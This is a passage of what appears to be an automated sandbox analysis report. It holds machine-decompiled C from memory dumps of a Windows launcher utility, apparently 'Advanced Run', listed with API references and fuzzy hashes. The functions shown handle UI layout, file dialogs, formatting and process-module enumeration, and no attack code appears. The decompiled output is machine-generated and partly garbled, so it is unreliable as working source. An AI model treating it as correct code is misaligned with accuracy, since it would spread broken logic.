                                                                                      									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					return _t31;
                                                                                      				}
                                                                                      			}

















                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                      • GetSystemMetrics.USER32 ref: 00402C23
                                                                                      • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                      • GetSystemMetrics.USER32 ref: 00402C30
                                                                                      • GetSystemMetrics.USER32 ref: 00402C47
                                                                                      • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem$Window
                                                                                      • String ID:
                                                                                      • API String ID: 1155976603-0
                                                                                      • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                      • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                      • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                      • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004036D5(void* __edi, void* __eflags) {
                                                                                      				intOrPtr _v8;
                                                                                      				char _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				char* _v24;
                                                                                      				char _v28;
                                                                                      				char* _v48;
                                                                                      				intOrPtr _v56;
                                                                                      				intOrPtr _v60;
                                                                                      				int _v64;
                                                                                      				int _v72;
                                                                                      				intOrPtr _v76;
                                                                                      				wchar_t* _v80;
                                                                                      				intOrPtr _v84;
                                                                                      				int _v92;
                                                                                      				char* _v96;
                                                                                      				intOrPtr _v104;
                                                                                      				struct tagOFNA _v108;
                                                                                      				void _v634;
                                                                                      				long _v636;
                                                                                      				void _v2682;
                                                                                      				char _v2684;
                                                                                      				void* __ebx;
                                                                                      				char _t37;
                                                                                      				intOrPtr _t38;
                                                                                      				int _t46;
                                                                                      				signed short _t54;
                                                                                      
                                                                                      				_v636 = 0;
                                                                                      				memset( &_v634, 0, 0x208);
                                                                                      				_v2684 = 0;
                                                                                      				memset( &_v2682, 0, 0x7fe);
                                                                                      				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
                                                                                      				_v12 = _t37;
                                                                                      				_t38 =  *0x40cbf0; // 0x67
                                                                                      				_v8 = _t38;
                                                                                      				_v28 = E00405B81(0x227);
                                                                                      				_v24 = L"*.cfg";
                                                                                      				_v20 = E00405B81(0x228);
                                                                                      				_v16 = L"*.*";
                                                                                      				E00405236( &_v2684,  &_v28);
                                                                                      				_t54 = 0xa;
                                                                                      				_v60 = E00405B81(_t54);
                                                                                      				_v104 =  *((intOrPtr*)(__edi + 0x10));
                                                                                      				_v48 =  &_v12;
                                                                                      				_v96 =  &_v2684;
                                                                                      				_v108 = 0x4c;
                                                                                      				_v92 = 0;
                                                                                      				_v84 = 1;
                                                                                      				_v80 =  &_v636;
                                                                                      				_v76 = 0x104;
                                                                                      				_v72 = 0;
                                                                                      				_v64 = 0;
                                                                                      				_v56 = 0x80806;
                                                                                      				_t46 = GetSaveFileNameW( &_v108);
                                                                                      				if(_t46 != 0) {
                                                                                      					wcscpy( &_v636, _v80);
                                                                                      					return E0040365E(__edi, 1,  &_v636);
                                                                                      				}
                                                                                      				return _t46;
                                                                                      			}































                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004036F6
                                                                                      • memset.MSVCRT ref: 00403712
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                        • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                        • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                        • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                        • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                        • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                        • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                        • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                        • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                      • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                      • wcscpy.MSVCRT ref: 004037C3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                      • String ID: L$cfg
                                                                                      • API String ID: 275899518-3734058911
                                                                                      • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                      • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                      • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                      • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
                                                                                      				struct _SYSTEMTIME _v20;
                                                                                      				long _v276;
                                                                                      				long _v532;
                                                                                      				FILETIME* _t15;
                                                                                      
                                                                                      				_t15 = __eax;
                                                                                      				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                                      					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
                                                                                      						goto L5;
                                                                                      					} else {
                                                                                      						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
                                                                                      						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
                                                                                      						wcscpy(_a4,  &_v276);
                                                                                      						wcscat(_a4, " ");
                                                                                      						wcscat(_a4,  &_v532);
                                                                                      					}
                                                                                      				} else {
                                                                                      					L5:
                                                                                      					wcscpy(_a4, 0x40c4e8);
                                                                                      				}
                                                                                      				return _a4;
                                                                                      			}








                                                                                      APIs
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                      • wcscpy.MSVCRT ref: 00404F41
                                                                                      • wcscat.MSVCRT ref: 00404F4E
                                                                                      • wcscat.MSVCRT ref: 00404F5D
                                                                                      • wcscpy.MSVCRT ref: 00404F71
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                      • String ID:
                                                                                      • API String ID: 1331804452-0
                                                                                      • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                      • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                      • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                      • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 71%
                                                                                      			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                                                                                      				void _v514;
                                                                                      				long _v516;
                                                                                      				wchar_t* _t34;
                                                                                      				signed int _t35;
                                                                                      				void* _t36;
                                                                                      				void* _t37;
                                                                                      
                                                                                      				_t34 = __edi;
                                                                                      				_v516 = _v516 & 0x00000000;
                                                                                      				memset( &_v514, 0, 0x1fc);
                                                                                      				 *__edi =  *__edi & 0x00000000;
                                                                                      				_t37 = _t36 + 0xc;
                                                                                      				_t35 = 0;
                                                                                      				do {
                                                                                      					_push( *(_t35 + _a4) & 0x000000ff);
                                                                                      					_push(L"%2.2X");
                                                                                      					_push(0xff);
                                                                                      					_push( &_v516);
                                                                                      					L0040B1EC();
                                                                                      					_t37 = _t37 + 0x10;
                                                                                      					if(_t35 > 0) {
                                                                                      						wcscat(_t34, " ");
                                                                                      					}
                                                                                      					if(_a8 > 0) {
                                                                                      						asm("cdq");
                                                                                      						if(_t35 % _a8 == 0) {
                                                                                      							wcscat(_t34, L"  ");
                                                                                      						}
                                                                                      					}
                                                                                      					wcscat(_t34,  &_v516);
                                                                                      					_t35 = _t35 + 1;
                                                                                      				} while (_t35 < 0x80);
                                                                                      				return _t34;
                                                                                      			}










                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                      • String ID: %2.2X
                                                                                      • API String ID: 2521778956-791839006
                                                                                      • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                      • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                      • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                      • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 42%
                                                                                      			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                      				void _v514;
                                                                                      				char _v516;
                                                                                      				void _v1026;
                                                                                      				char _v1028;
                                                                                      				void* __esi;
                                                                                      				intOrPtr* _t16;
                                                                                      				void* _t19;
                                                                                      				intOrPtr* _t29;
                                                                                      				char* _t31;
                                                                                      
                                                                                      				_t29 = __ecx;
                                                                                      				_v516 = 0;
                                                                                      				memset( &_v514, 0, 0x1fc);
                                                                                      				_v1028 = 0;
                                                                                      				memset( &_v1026, 0, 0x1fc);
                                                                                      				_t16 = _t29;
                                                                                      				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
                                                                                      					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                      				} else {
                                                                                      					_push(L"<?xml version=\"1.0\" ?>\r\n");
                                                                                      				}
                                                                                      				E00407343(_t16);
                                                                                      				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
                                                                                      				_t31 =  &_v516;
                                                                                      				E00407250(_t31, _t19);
                                                                                      				_push(_t31);
                                                                                      				_push(L"<%s>\r\n");
                                                                                      				_push(0xff);
                                                                                      				_push( &_v1028);
                                                                                      				L0040B1EC();
                                                                                      				return E00407343(_t29, _a4,  &_v1028);
                                                                                      			}













                                                                                      APIs
                                                                                      Strings
                                                                                      • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                      • <%s>, xrefs: 00407DF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf
                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                      • API String ID: 3473751417-2880344631
                                                                                      • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                      • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                      • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                      • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 70%
                                                                                      			E00403B3C(intOrPtr _a4) {
                                                                                      				void _v526;
                                                                                      				char _v528;
                                                                                      				void _v2574;
                                                                                      				char _v2576;
                                                                                      				void* __edi;
                                                                                      				intOrPtr _t29;
                                                                                      
                                                                                      				_v2576 = 0;
                                                                                      				memset( &_v2574, 0, 0x7fe);
                                                                                      				_v528 = 0;
                                                                                      				memset( &_v526, 0, 0x208);
                                                                                      				E00404AD9( &_v528);
                                                                                      				_push( &_v528);
                                                                                      				_push(L"\"%s\" /EXEFilename \"%%1\"");
                                                                                      				_push(0x3ff);
                                                                                      				_push( &_v2576);
                                                                                      				L0040B1EC();
                                                                                      				_t37 = _a4 + 0xa68;
                                                                                      				E00404923(0x104, _a4 + 0xa68, L"exefile");
                                                                                      				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
                                                                                      				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
                                                                                      				_t29 = E0040467A(_t37);
                                                                                      				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
                                                                                      				return _t29;
                                                                                      			}










                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00403B5D
                                                                                      • memset.MSVCRT ref: 00403B76
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • _snwprintf.MSVCRT ref: 00403B9F
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                        • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                        • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                        • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                        • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                      • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                      • API String ID: 1832587304-479876776
                                                                                      • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                      • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                      • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                      • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                                                                                      				void* _v8;
                                                                                      				int _v12;
                                                                                      				short _v524;
                                                                                      				char _v1036;
                                                                                      				void* __edi;
                                                                                      
                                                                                      				wcscpy( &_v524, L"\\StringFileInfo\\");
                                                                                      				wcscat( &_v524, _a8);
                                                                                      				wcscat( &_v524, "\\");
                                                                                      				wcscat( &_v524, _a12);
                                                                                      				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t34 =  &_v1036;
                                                                                      				E00404923(0xff,  &_v1036, _v8);
                                                                                      				E004049A2(_t34, __esi);
                                                                                      				return 1;
                                                                                      			}

                                                                                      APIs
                                                                                      • wcscpy.MSVCRT ref: 0040AFD3
                                                                                      • wcscat.MSVCRT ref: 0040AFE2
                                                                                      • wcscat.MSVCRT ref: 0040AFF3
                                                                                      • wcscat.MSVCRT ref: 0040B002
                                                                                      • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                        • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                        • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                      • String ID: \StringFileInfo\
                                                                                      • API String ID: 393120378-2245444037
                                                                                      • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                      • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                      • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                      • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintfwcscpy
                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                      • API String ID: 999028693-502967061
                                                                                      • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                      • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                      • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                      • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 38%
                                                                                      			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
                                                                                      				void* _v0;
                                                                                      				intOrPtr _v4;
                                                                                      				intOrPtr _v8;
                                                                                      				unsigned int _v12;
                                                                                      				void* _v16;
                                                                                      				char _v20;
                                                                                      				char _v24;
                                                                                      				intOrPtr _v32;
                                                                                      				intOrPtr _v36;
                                                                                      				intOrPtr _v44;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr _t58;
                                                                                      				void* _t59;
                                                                                      				void* _t69;
                                                                                      				void* _t72;
                                                                                      				intOrPtr _t78;
                                                                                      				void _t89;
                                                                                      				signed int _t90;
                                                                                      				int _t98;
                                                                                      				signed int _t105;
                                                                                      				signed int _t106;
                                                                                      				void* _t109;
                                                                                      
                                                                                      				_t106 = _t105 & 0xfffffff8;
                                                                                      				E0040B550(0x8874, __ecx);
                                                                                      				_t98 = 0;
                                                                                      				_a8 = 0;
                                                                                      				if(E00404BD3() == 0) {
                                                                                      					L12:
                                                                                      					__eflags =  *0x4101b8 - _t98; // 0x0
                                                                                      					if(__eflags != 0) {
                                                                                      						_t89 = _a4;
                                                                                      						_t58 =  *0x40f83c(8, _t89);
                                                                                      						__eflags = _t58 - 0xffffffff;
                                                                                      						_v8 = _t58;
                                                                                      						if(_t58 != 0xffffffff) {
                                                                                      							_v0 = 1;
                                                                                      							_a560 = 0x428;
                                                                                      							_t59 =  *0x40f834(_t58,  &_a560);
                                                                                      							while(1) {
                                                                                      								__eflags = _t59;
                                                                                      								if(_t59 == 0) {
                                                                                      									goto L18;
                                                                                      								}
                                                                                      								memset( &_a8, _t98, 0x21c);
                                                                                      								_a12 = _a580;
                                                                                      								_a8 = _t89;
                                                                                      								wcscpy( &_a16,  &_a1096);
                                                                                      								_a540 = _a576;
                                                                                      								_t106 = _t106 + 0x14;
                                                                                      								_a544 = _a572;
                                                                                      								_a552 = 0x428;
                                                                                      								_t69 = E00409510(_a8,  &_a8);
                                                                                      								__eflags = _t69;
                                                                                      								if(_t69 != 0) {
                                                                                      									_t59 =  *0x40f830(_v16,  &_a552);
                                                                                      									continue;
                                                                                      								}
                                                                                      								goto L18;
                                                                                      							}
                                                                                      							goto L18;
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t109 =  *0x4101bc - _t98; // 0x0
                                                                                      					if(_t109 == 0) {
                                                                                      						goto L12;
                                                                                      					} else {
                                                                                      						_t72 = OpenProcess(0x410, 0, _a4);
                                                                                      						_v0 = _t72;
                                                                                      						if(_t72 != 0) {
                                                                                      							_push( &_a4);
                                                                                      							_push(0x8000);
                                                                                      							_push( &_a2160);
                                                                                      							_push(_t72);
                                                                                      							if( *0x40f840() != 0) {
                                                                                      								_t6 =  &_v12;
                                                                                      								 *_t6 = _v12 >> 2;
                                                                                      								_v8 = 1;
                                                                                      								_t90 = 0;
                                                                                      								if( *_t6 != 0) {
                                                                                      									while(1) {
                                                                                      										_a1616 = _t98;
                                                                                      										memset( &_a1618, _t98, 0x208);
                                                                                      										memset( &_a8, _t98, 0x21c);
                                                                                      										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
                                                                                      										_t106 = _t106 + 0x18;
                                                                                      										_a8 = _a4;
                                                                                      										_a12 = _t78;
                                                                                      										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
                                                                                      										E0040920A( &_v0,  &_a1600);
                                                                                      										_push(0xc);
                                                                                      										_push( &_v20);
                                                                                      										_push(_v4);
                                                                                      										_push(_v32);
                                                                                      										if( *0x40f844() != 0) {
                                                                                      											_a508 = _v32;
                                                                                      											_a512 = _v36;
                                                                                      										}
                                                                                      										if(E00409510(_a8,  &_v24) == 0) {
                                                                                      											goto L18;
                                                                                      										}
                                                                                      										_t90 = _t90 + 1;
                                                                                      										if(_t90 < _v44) {
                                                                                      											_t98 = 0;
                                                                                      											__eflags = 0;
                                                                                      											continue;
                                                                                      										} else {
                                                                                      										}
                                                                                      										goto L18;
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      							L18:
                                                                                      							CloseHandle(_v16);
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return _a8;
                                                                                      			}
                                                                                      0x0040939d
                                                                                      0x004093a5
                                                                                      0x004093ac
                                                                                      0x004093b4
                                                                                      0x004093c5
                                                                                      0x004093c9
                                                                                      0x004093da
                                                                                      0x004093df
                                                                                      0x004093e5
                                                                                      0x004093e6
                                                                                      0x004093ea
                                                                                      0x004093f6
                                                                                      0x004093fc
                                                                                      0x00409407
                                                                                      0x00409407
                                                                                      0x0040941d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00409423
                                                                                      0x00409428
                                                                                      0x00409375
                                                                                      0x00409375
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040942e
                                                                                      0x00000000
                                                                                      0x00409428
                                                                                      0x00409377
                                                                                      0x0040936d
                                                                                      0x004094fb
                                                                                      0x004094ff
                                                                                      0x004094ff
                                                                                      0x00409337
                                                                                      0x0040931c
                                                                                      0x0040950f

                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                      • memset.MSVCRT ref: 0040938D
                                                                                      • memset.MSVCRT ref: 0040939D
                                                                                        • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                      • memset.MSVCRT ref: 00409488
                                                                                      • wcscpy.MSVCRT ref: 004094A9
                                                                                      • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                      • String ID:
                                                                                      • API String ID: 3300951397-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 44%
                                                                                      			E00402EC8(void* __ebx) {
                                                                                      				struct tagRECT _v20;
                                                                                      				struct tagPAINTSTRUCT _v84;
                                                                                      
                                                                                      				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                      				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                      				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                      				asm("movsd");
                                                                                      				asm("movsd");
                                                                                      				asm("movsd");
                                                                                      				asm("movsd");
                                                                                      				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                      				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                      			}






                                                                                      APIs
                                                                                      Memory Dump Source
